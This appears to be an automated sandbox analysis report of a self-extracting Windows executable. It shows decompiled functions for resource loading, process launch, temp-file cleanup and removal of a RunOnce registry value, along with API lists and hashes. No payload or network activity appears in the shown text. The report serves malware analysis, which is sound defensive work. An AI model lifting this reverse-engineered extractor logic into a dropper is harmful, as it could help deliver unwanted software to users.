                                                                                                                                                                                                                                              					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                                                              						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                                                              						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                                                              							 *0xa89a2c = _t44;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				E00A8411B(_t34, _t44);
                                                                                                                                                                                                                                              				CloseHandle(_v544.hThread);
                                                                                                                                                                                                                                              				CloseHandle(_v544);
                                                                                                                                                                                                                                              				if(( *0xa89a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                                                              					goto L12;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}



















APIs
• CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 00A84033
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A84049
• GetExitCodeProcess.KERNELBASE ref: 00A8405C
• CloseHandle.KERNEL32(?), ref: 00A8409C
• CloseHandle.KERNEL32(?), ref: 00A840A8
• GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A840DC
• FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00A840E9
Memory Dump Source
• Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
• Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
Similarity
• API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
• String ID:
• API String ID: 3183975587-0
• Opcode ID: ced5d338c841f3a211bdb824f32c02e09c748bc0a548bd0b6e677fcb97175ba5
• Instruction ID: 23cac4d61fe4f014bdb09813c79e9e17397290a4004c2071179897915ba79f91
• Opcode Fuzzy Hash: ced5d338c841f3a211bdb824f32c02e09c748bc0a548bd0b6e677fcb97175ba5
• Instruction Fuzzy Hash: D931C831640218ABEB20EFA5DC4DFBBBB7CEB98701F1002AAF505D1161CA344D86CF11
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

control_flow_graph 652 a851e5-a8520b call a8468f LocalAlloc 655 a8522d-a8523c call a8468f 652->655 656 a8520d-a85228 call a844b9 call a86285 652->656 662 a8523e-a85260 call a844b9 LocalFree 655->662 663 a85262-a85270 lstrcmpA 655->663 671 a852b0 656->671 662->671 664 a8527e-a8529c call a844b9 LocalFree 663->664 665 a85272-a85273 LocalFree 663->665 674 a8529e-a852a4 664->674 675 a852a6 664->675 669 a85279-a8527c 665->669 672 a852b2-a852b5 669->672 671->672 674->669 675->671
C-Code - Quality: 100%
E00A851E5(void* __eflags) {
    int _t5;
    void* _t6;
    void* _t28;

    _t1 = E00A8468F("UPROMPT", 0, 0) + 1; // 0x1
    _t28 = LocalAlloc(0x40, _t1);
    if(_t28 != 0) {
        if(E00A8468F("UPROMPT", _t28, _t29) != 0) {
            _t5 = lstrcmpA(_t28, "<None>"); // executed
            if(_t5 != 0) {
                _t6 = E00A844B9(0, 0x3e9, _t28, 0, 0x20, 4);
                LocalFree(_t28);
                if(_t6 != 6) {
                    *0xa89124 = 0x800704c7;
                    L10:
                    return 0;
                }
                *0xa89124 = 0;
                L6:
                return 1;
            }
            LocalFree(_t28);
            goto L6;
        }
        E00A844B9(0, 0x4b1, 0, 0, 0x10, 0);
        LocalFree(_t28);
        *0xa89124 = 0x80070714;
        goto L10;
    }
    E00A844B9(0, 0x4b5, 0, 0, 0x10, 0);
    *0xa89124 = E00A86285();
    goto L10;
}







                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846A0
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: SizeofResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846A9
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A846C3
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: LoadResource.KERNEL32(00000000,00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846CC
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: LockResource.KERNEL32(00000000,?,00A82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846D3
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: memcpy_s.MSVCRT ref: 00A846E5
                                                                                                                                                                                                                                                • Part of subcall function 00A8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A846EF
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A82F4D,?,00000002,00000000), ref: 00A85201
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A85250
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A84518
                                                                                                                                                                                                                                                • Part of subcall function 00A844B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A84554
                                                                                                                                                                                                                                                • Part of subcall function 00A86285: GetLastError.KERNEL32(00A85BBC), ref: 00A86285
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                              • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                              • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                              • Opcode ID: eaf3fa8323b74dc6b379e569ead816556f148b24265d797066efe0f71071e5e7
                                                                                                                                                                                                                                              • Instruction ID: 5387a5c2c4680eb1e9e0a3742990280edf42d0e0cc0ce81f3c2ecbc239b57da8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eaf3fa8323b74dc6b379e569ead816556f148b24265d797066efe0f71071e5e7
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 711108B1A00601ABE354BBF15D89F7B61EDEB98350F104439FA02D5190FF789C024325
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 74%
                                                                                                                                                                                                                                              			E00A852B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				signed int _t9;
                                                                                                                                                                                                                                              				signed int _t11;
                                                                                                                                                                                                                                              				void* _t21;
                                                                                                                                                                                                                                              				void* _t29;
                                                                                                                                                                                                                                              				CHAR** _t31;
                                                                                                                                                                                                                                              				void* _t32;
                                                                                                                                                                                                                                              				signed int _t33;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t28 = __edi;
                                                                                                                                                                                                                                              				_t22 = __ecx;
                                                                                                                                                                                                                                              				_t21 = __ebx;
                                                                                                                                                                                                                                              				_t9 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                                                                              				_t31 =  *0xa891e0; // 0x808e20
                                                                                                                                                                                                                                              				if(_t31 != 0) {
                                                                                                                                                                                                                                              					_push(__edi);
                                                                                                                                                                                                                                              					do {
                                                                                                                                                                                                                                              						_t29 = _t31;
                                                                                                                                                                                                                                              						if( *0xa88a24 == 0 &&  *0xa89a30 == 0) {
                                                                                                                                                                                                                                              							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                                                              							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t31 = _t31[1];
                                                                                                                                                                                                                                              						LocalFree( *_t29);
                                                                                                                                                                                                                                              						LocalFree(_t29);
                                                                                                                                                                                                                                              					} while (_t31 != 0);
                                                                                                                                                                                                                                              					_pop(_t28);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t11 =  *0xa88a20; // 0x0
                                                                                                                                                                                                                                              				_pop(_t32);
                                                                                                                                                                                                                                              				if(_t11 != 0 &&  *0xa88a24 == 0 &&  *0xa89a30 == 0) {
                                                                                                                                                                                                                                              					_push(_t22);
                                                                                                                                                                                                                                              					E00A81781( &_v268, 0x104, _t22, "C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                              					if(( *0xa89a34 & 0x00000020) != 0) {
                                                                                                                                                                                                                                              						E00A865E8( &_v268);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                                                              					_t22 =  &_v268;
                                                                                                                                                                                                                                              					E00A82390( &_v268);
                                                                                                                                                                                                                                              					_t11 =  *0xa88a20; // 0x0
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if( *0xa89a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                                                              					_t11 = E00A81FE1(_t22); // executed
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				 *0xa88a20 =  *0xa88a20 & 0x00000000;
                                                                                                                                                                                                                                              				return E00A86CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                              0x00a8531c
                                                                                                                                                                                                                                              0x00a8531f
                                                                                                                                                                                                                                              0x00a85333
                                                                                                                                                                                                                                              0x00a85345
                                                                                                                                                                                                                                              0x00a85351
                                                                                                                                                                                                                                              0x00a85359
                                                                                                                                                                                                                                              0x00a85359
                                                                                                                                                                                                                                              0x00a85363
                                                                                                                                                                                                                                              0x00a85369
                                                                                                                                                                                                                                              0x00a8536f
                                                                                                                                                                                                                                              0x00a85374
                                                                                                                                                                                                                                              0x00a85374
                                                                                                                                                                                                                                              0x00a85381
                                                                                                                                                                                                                                              0x00a85387
                                                                                                                                                                                                                                              0x00a85387
                                                                                                                                                                                                                                              0x00a8538f
                                                                                                                                                                                                                                              0x00a853a0

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SetFileAttributesA.KERNELBASE(00808E20,00000080,?,00000000), ref: 00A852F2
                                                                                                                                                                                                                                              • DeleteFileA.KERNELBASE(00808E20), ref: 00A852FA
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00808E20,?,00000000), ref: 00A85305
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00808E20), ref: 00A8530C
                                                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(00A811FC,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 00A85363
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00A85334
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                              • API String ID: 2833751637-1610346413
                                                                                                                                                                                                                                              • Opcode ID: 307f6df30e46c1129b8d5cc928dd59e109caaba677f333e42d55132a4374503d
                                                                                                                                                                                                                                              • Instruction ID: fe582ad9e108368094c82af26601fbc291c08a0ca6c32c6bd669d29f78bb12bf
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 307f6df30e46c1129b8d5cc928dd59e109caaba677f333e42d55132a4374503d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9221C331D10604DBDB28FBA0DD59B6AB7B4FB10790F48015AE8425A1A0CFB45C87CB41
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00A81FE1(void* __ecx) {
                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                              				long _t4;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				if( *0xa88530 != 0) {
                                                                                                                                                                                                                                              					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                                                              					if(_t4 == 0) {
                                                                                                                                                                                                                                              						RegDeleteValueA(_v8, "wextract_cleanup2"); // executed
                                                                                                                                                                                                                                              						return RegCloseKey(_v8);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t4;
                                                                                                                                                                                                                                              			}






                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,00A8538C,?,?,00A8538C), ref: 00A82005
                                                                                                                                                                                                                                              • RegDeleteValueA.KERNELBASE(00A8538C,wextract_cleanup2,?,?,00A8538C), ref: 00A82017
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00A8538C,?,?,00A8538C), ref: 00A82020
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup2
                                                                                                                                                                                                                                              • API String ID: 849931509-3354236729
                                                                                                                                                                                                                                              • Opcode ID: b79a07b13a9806e7076605cf4245146a9cf8df9987119b996383efed85c544fb
                                                                                                                                                                                                                                              • Instruction ID: 6bf923768595cf4fd0482085f7499c648cd719a45e08afb415bd51fd3953bf5f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b79a07b13a9806e7076605cf4245146a9cf8df9987119b996383efed85c544fb
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FFE04F30A50318BBE722EBD0EC0AF697B79F711741F600195B905A0060EF655E15D705
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                                                              			E00A84CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t29;
                                                                                                                                                                                                                                              				int _t30;
                                                                                                                                                                                                                                              				long _t32;
                                                                                                                                                                                                                                              				signed int _t33;
                                                                                                                                                                                                                                              				long _t35;
                                                                                                                                                                                                                                              				long _t36;
                                                                                                                                                                                                                                              				struct HWND__* _t37;
                                                                                                                                                                                                                                              				long _t38;
                                                                                                                                                                                                                                              				long _t39;
                                                                                                                                                                                                                                              				long _t41;
                                                                                                                                                                                                                                              				long _t44;
                                                                                                                                                                                                                                              				long _t45;
                                                                                                                                                                                                                                              				long _t46;
                                                                                                                                                                                                                                              				signed int _t50;
                                                                                                                                                                                                                                              				long _t51;
                                                                                                                                                                                                                                              				char* _t58;
                                                                                                                                                                                                                                              				long _t59;
                                                                                                                                                                                                                                              				char* _t63;
                                                                                                                                                                                                                                              				long _t64;
                                                                                                                                                                                                                                              				CHAR* _t71;
                                                                                                                                                                                                                                              				CHAR* _t74;
                                                                                                                                                                                                                                              				int _t75;
                                                                                                                                                                                                                                              				signed int _t76;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t69 = __edx;
                                                                                                                                                                                                                                              				_t29 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                                                              				_v8 = _t30;
                                                                                                                                                                                                                                              				_t75 = _a8;
                                                                                                                                                                                                                                              				if( *0xa891d8 == 0) {
                                                                                                                                                                                                                                              					_t32 = _a4;
                                                                                                                                                                                                                                              					__eflags = _t32;
                                                                                                                                                                                                                                              					if(_t32 == 0) {
                                                                                                                                                                                                                                              						_t33 = E00A84E99(_t75);
                                                                                                                                                                                                                                              						L35:
                                                                                                                                                                                                                                              						return E00A86CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t35 = _t32 - 1;
                                                                                                                                                                                                                                              					__eflags = _t35;
                                                                                                                                                                                                                                              					if(_t35 == 0) {
                                                                                                                                                                                                                                              						L9:
                                                                                                                                                                                                                                              						_t33 = 0;
                                                                                                                                                                                                                                              						goto L35;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t36 = _t35 - 1;
                                                                                                                                                                                                                                              					__eflags = _t36;
                                                                                                                                                                                                                                              					if(_t36 == 0) {
                                                                                                                                                                                                                                              						_t37 =  *0xa88584; // 0x0
                                                                                                                                                                                                                                              						__eflags = _t37;
                                                                                                                                                                                                                                              						if(_t37 != 0) {
                                                                                                                                                                                                                                              							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t54 = 0xa891e4;
                                                                                                                                                                                                                                              						_t58 = 0xa891e4;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t38 =  *_t58;
                                                                                                                                                                                                                                              							_t58 =  &(_t58[1]);
                                                                                                                                                                                                                                              							__eflags = _t38;
                                                                                                                                                                                                                                              						} while (_t38 != 0);
                                                                                                                                                                                                                                              						_t59 = _t58 - 0xa891e5;
                                                                                                                                                                                                                                              						__eflags = _t59;
                                                                                                                                                                                                                                              						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                                                              						_t73 =  &(_t71[1]);
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t39 =  *_t71;
                                                                                                                                                                                                                                              							_t71 =  &(_t71[1]);
                                                                                                                                                                                                                                              							__eflags = _t39;
                                                                                                                                                                                                                                              						} while (_t39 != 0);
                                                                                                                                                                                                                                              						_t69 = _t71 - _t73;
                                                                                                                                                                                                                                              						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                                                              						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                              						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                              							L3:
                                                                                                                                                                                                                                              							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                                                              							goto L35;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t69 = 0xa891e4;
                                                                                                                                                                                                                                              						_t30 = E00A84702( &_v268, 0xa891e4,  *(_t75 + 4));
                                                                                                                                                                                                                                              						__eflags = _t30;
                                                                                                                                                                                                                                              						if(__eflags == 0) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t41 = E00A8476D( &_v268, __eflags);
                                                                                                                                                                                                                                              						__eflags = _t41;
                                                                                                                                                                                                                                              						if(_t41 == 0) {
                                                                                                                                                                                                                                              							goto L9;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_push(0x180);
                                                                                                                                                                                                                                              						_t30 = E00A84980( &_v268, 0x8302); // executed
                                                                                                                                                                                                                                              						_t75 = _t30;
                                                                                                                                                                                                                                              						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                                                              						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t30 = E00A847E0( &_v268);
                                                                                                                                                                                                                                              						__eflags = _t30;
                                                                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						 *0xa893f4 =  *0xa893f4 + 1;
                                                                                                                                                                                                                                              						_t33 = _t75;
                                                                                                                                                                                                                                              						goto L35;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t44 = _t36 - 1;
                                                                                                                                                                                                                                              					__eflags = _t44;
                                                                                                                                                                                                                                              					if(_t44 == 0) {
                                                                                                                                                                                                                                              						_t54 = 0xa891e4;
                                                                                                                                                                                                                                              						_t63 = 0xa891e4;
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t45 =  *_t63;
                                                                                                                                                                                                                                              							_t63 =  &(_t63[1]);
                                                                                                                                                                                                                                              							__eflags = _t45;
                                                                                                                                                                                                                                              						} while (_t45 != 0);
                                                                                                                                                                                                                                              						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                                                              						_t64 = _t63 - 0xa891e5;
                                                                                                                                                                                                                                              						__eflags = _t64;
                                                                                                                                                                                                                                              						_t69 =  &(_t74[1]);
                                                                                                                                                                                                                                              						do {
                                                                                                                                                                                                                                              							_t46 =  *_t74;
                                                                                                                                                                                                                                              							_t74 =  &(_t74[1]);
                                                                                                                                                                                                                                              							__eflags = _t46;
                                                                                                                                                                                                                                              						} while (_t46 != 0);
                                                                                                                                                                                                                                              						_t73 = _t74 - _t69;
                                                                                                                                                                                                                                              						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                                                              						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                              						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t69 = 0xa891e4;
                                                                                                                                                                                                                                              						_t30 = E00A84702( &_v268, 0xa891e4,  *(_t75 + 4));
                                                                                                                                                                                                                                              						__eflags = _t30;
                                                                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                                                              						_t30 = E00A84C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                                                              						__eflags = _t30;
                                                                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						E00A84B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                                                              						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                                                              						__eflags = _t50;
                                                                                                                                                                                                                                              						if(_t50 != 0) {
                                                                                                                                                                                                                                              							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                                                              							__eflags = _t51;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t51 = 0x80;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                                                              						__eflags = _t30;
                                                                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t33 = 1;
                                                                                                                                                                                                                                              							goto L35;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t30 = _t44 - 1;
                                                                                                                                                                                                                                              					__eflags = _t30;
                                                                                                                                                                                                                                              					if(_t30 == 0) {
                                                                                                                                                                                                                                              						goto L3;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L9;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_a4 == 3) {
                                                                                                                                                                                                                                              					_t30 = E00A84B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				goto L3;
                                                                                                                                                                                                                                              			}































                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a84d67
                                                                                                                                                                                                                                              0x00a84d6f
                                                                                                                                                                                                                                              0x00a84d74
                                                                                                                                                                                                                                              0x00a84d76
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a84d7c
                                                                                                                                                                                                                                              0x00a84d84
                                                                                                                                                                                                                                              0x00a84d89
                                                                                                                                                                                                                                              0x00a84d8b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a84d94
                                                                                                                                                                                                                                              0x00a84d99
                                                                                                                                                                                                                                              0x00a84d9e
                                                                                                                                                                                                                                              0x00a84da1
                                                                                                                                                                                                                                              0x00a84daa
                                                                                                                                                                                                                                              0x00a84daa
                                                                                                                                                                                                                                              0x00a84da3
                                                                                                                                                                                                                                              0x00a84da3
                                                                                                                                                                                                                                              0x00a84da3
                                                                                                                                                                                                                                              0x00a84db5
                                                                                                                                                                                                                                              0x00a84dbb
                                                                                                                                                                                                                                              0x00a84dbd
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a84dc3
                                                                                                                                                                                                                                              0x00a84dc5
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a84dc5
                                                                                                                                                                                                                                              0x00a84dbd
                                                                                                                                                                                                                                              0x00a84d2a
                                                                                                                                                                                                                                              0x00a84d2a
                                                                                                                                                                                                                                              0x00a84d2d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a84d2d
                                                                                                                                                                                                                                              0x00a84cf8
                                                                                                                                                                                                                                              0x00a84cfd
                                                                                                                                                                                                                                              0x00a84d02
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00A84DB5
                                                                                                                                                                                                                                              • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00A84DDD
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmp
